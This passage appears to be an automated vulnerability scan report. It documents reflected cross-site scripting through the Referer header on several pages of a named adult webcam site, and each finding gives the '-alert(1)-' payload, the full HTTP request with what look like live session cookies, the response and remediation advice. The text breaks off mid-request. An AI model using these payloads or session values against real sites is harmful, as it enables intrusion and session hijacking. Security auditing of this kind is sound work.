<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... ript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/aroundthehouse.aspx&he=imlive.com&ul=/live-sex-chats/cams-aroundthehouse/&rf=http://www.google.com/search?hl=en^q=5e389'-alert(1)-'41c0351c2c2&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9792b'-alert(1)-'ba39155c916 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/caught-on-cam/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=9792b'-alert(1)-'ba39155c916
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:34 GMT Connection: close Content-Length: 25658 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... xt/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/caughtoncam.aspx&he=imlive.com&ul=/live-sex-chats/caught-on-cam/&rf=http://www.google.com/search?hl=en^q=9792b'-alert(1)-'ba39155c916&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67099'-alert(1)-'bb279cc6b57 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/couple/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=67099'-alert(1)-'bb279cc6b57
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:29 GMT Connection: close Content-Length: 113880 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... t type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/couple/&rf=http://www.google.com/search?hl=en^q=67099'-alert(1)-'bb279cc6b57&qs=cat=1^roomid=12&qs=cat=1^roomid=12&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8877f'-alert(1)-'f0d179f333a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/fetish/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=8877f'-alert(1)-'f0d179f333a
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:07 GMT Connection: close Content-Length: 213457 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... t type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/fetish/&rf=http://www.google.com/search?hl=en^q=8877f'-alert(1)-'f0d179f333a&qs=cat=1^roomid=13&qs=cat=1^roomid=13&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c608e'-alert(1)-'0606a3ceeb1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/fetish/categories/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=c608e'-alert(1)-'0606a3ceeb1
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:36 GMT Connection: close Content-Length: 24548 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... t">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/fetish_category_sub.aspx&he=imlive.com&ul=/live-sex-chats/fetish/categories/&rf=http://www.google.com/search?hl=en^q=c608e'-alert(1)-'0606a3ceeb1&qs=roomid=13&qs=roomid=13&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.att ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96bee'-alert(1)-'306a0aabfe1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/free-sex-video-for-ipod/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=96bee'-alert(1)-'306a0aabfe1
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:34 GMT Connection: close Content-Length: 72576 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... script">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/ipodmain.aspx&he=imlive.com&ul=/live-sex-chats/free-sex-video-for-ipod/&rf=http://www.google.com/search?hl=en^q=96bee'-alert(1)-'306a0aabfe1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38c58'-alert(1)-'c21d7feff7f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/free-sex-video/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=38c58'-alert(1)-'c21d7feff7f
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:34 GMT Connection: close Content-Length: 51719 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... ascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/competitionspage.aspx&he=imlive.com&ul=/live-sex-chats/free-sex-video/&rf=http://www.google.com/search?hl=en^q=38c58'-alert(1)-'c21d7feff7f&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 375ba'-alert(1)-'7a67cb13099 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/gay-couple/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=375ba'-alert(1)-'7a67cb13099
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:05 GMT Connection: close Content-Length: 33567 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... pe="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/gay-couple/&rf=http://www.google.com/search?hl=en^q=375ba'-alert(1)-'7a67cb13099&qs=cat=1^roomid=52&qs=cat=1^roomid=52&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ca5e'-alert(1)-'e9dfbf1b8ea was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/gay/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: 